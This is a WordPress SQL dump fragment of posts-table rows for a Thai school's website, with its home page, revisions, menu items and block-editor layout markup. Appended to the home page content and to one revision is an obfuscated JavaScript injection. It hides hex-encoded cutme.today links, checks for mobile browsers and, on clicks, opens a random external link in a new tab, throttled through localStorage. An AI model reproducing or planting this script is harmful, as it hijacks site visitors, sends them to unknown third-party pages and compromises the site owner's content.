_0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','publish','closed','closed','','%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b9%81%e0%b8%a3%e0%b8%81','','','2025-09-11 15:01:52','2025-09-11 08:01:52','',0,'http://pakhaeng.ssk.in.th/?page_id=14',0,'page','',0),
(15,1,'2024-07-27 09:56:04','2024-07-27 02:56:04','','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 09:56:04','2024-07-27 02:56:04','',14,'http://pakhaeng.ssk.in.th/?p=15',0,'revision','',0),
(16,1,'2025-07-16 11:17:13','2024-07-27 02:57:19',' ','','','publish','closed','closed','','16','','','2025-07-16 11:17:13','2025-07-16 04:17:13','',0,'http://pakhaeng.ssk.in.th/?p=16',1,'nav_menu_item','',0),
(17,1,'2025-07-16 11:17:13','2024-07-27 02:57:19','','ข้อมูลโรงเรียน','','publish','closed','closed','','%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2025-07-16 11:17:13','2025-07-16 04:17:13','',0,'http://pakhaeng.ssk.in.th/?p=17',2,'nav_menu_item','',0),
(18,1,'2025-07-16 11:17:14','2024-07-27 02:57:19','','บุคลากร','','publish','closed','closed','','%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3','','','2025-07-16 11:17:14','2025-07-16 04:17:14','',0,'http://pakhaeng.ssk.in.th/?p=18',5,'nav_menu_item','',0),
(19,1,'2025-07-16 11:17:14','2024-07-27 02:57:19','','ITA ONLINE','','publish','closed','closed','','ita-online','','','2025-07-16 11:17:14','2025-07-16 04:17:14','',0,'http://pakhaeng.ssk.in.th/?p=19',6,'nav_menu_item','',0),
(20,1,'2025-07-16 11:17:14','2024-07-27 02:57:19','','ติดต่อเรา','','publish','closed','closed','','%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%a3%e0%b8%b2','','','2025-07-16 11:17:14','2025-07-16 04:17:14','',0,'http://pakhaeng.ssk.in.th/?p=20',7,'nav_menu_item','',0),
(21,1,'2024-07-27 09:59:04','2024-07-27 02:59:04','','ผอ','','inherit','','closed','','%e0%b8%9c%e0%b8%ad','','','2024-07-27 09:59:04','2024-07-27 02:59:04','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ.png',0,'attachment','image/png',0),
(23,1,'2024-07-27 09:59:57','2024-07-27 02:59:57','','โรงเรียนบ้านหนองปลาเข็ง-กอไหล่','','inherit','closed','closed','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9a%e0%b9%89%e0%b8%b2%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%81%e0%b8%aa%e0%b8%b0%e0%b8%ad%e0%b8%b2%e0%b8%94','','','2024-07-27 10:00:09','2024-07-27 03:00:09','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png',0,'attachment','image/png',0),
(24,1,'2024-07-27 10:00:36','2024-07-27 03:00:36','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"20px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:00:36','2024-07-27 03:00:36','',14,'http://pakhaeng.ssk.in.th/?p=24',0,'revision','',0),
(25,1,'2024-07-27 10:00:55','2024-07-27 03:00:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"20px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:kadence/advancedgallery 